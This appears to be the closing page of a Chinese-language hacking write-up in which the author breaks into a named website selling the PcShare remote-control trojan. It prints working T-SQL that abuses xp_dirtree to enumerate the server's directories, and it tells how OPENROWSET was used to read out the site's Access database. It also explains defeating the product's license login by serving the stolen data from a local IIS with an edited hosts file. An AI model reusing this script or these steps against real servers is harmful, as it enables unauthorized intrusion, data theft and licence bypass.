http://www.pcshares.cn/pcshare200/user.asp
写sql语句查找：
drop table tmp;
create table tmp
(
[id] [int] IDENTITY (1,1) NOT NULL,
[name] [nvarchar] (300) NOT NULL,
[depth] [int] NOT NULL
);

declare @id int, @depth int, @root nvarchar(300), @name nvarchar(300)
set @root='f:\usr\' -- Start root
set @name='pcshare200' -- directory to find
insert into tmp exec master..xp_dirtree @root,0,0
set @id=(select top 1 id from tmp where name=@name)
set @depth=(select top 1 depth from tmp where name=@name)
while @depth<>1
begin
set @id=(select top 1 id from tmp where id<@id and depth=(@depth-1) order by id desc)
set @depth=(select depth from tmp where id=@id)
set @name=(select name from tmp where id=@id)+'\'+@name
end update tmp set name=@root+@name where id=1
select name from tmp where id=1

ok,一会便找出来目录的地址。

然后再进pcshare200目录一看，什么都明白了。

数据库的名字真长，不过用的acces的。
还有什么好说的呢。。。
最后用在sql中调用OPENROWSET连接acces读出数据走人，下了几个版本来玩玩，没什么意思，这类木马只有用来作秀用的。



实践证明现在的黑防远控就是pcshare，只是换了个地方卖东西罢了。把它的数据下下来了，直接在本地搭个iis,然后改下host文件，加上数据，我的登录验证就我作主了。

上一页  [1] [2]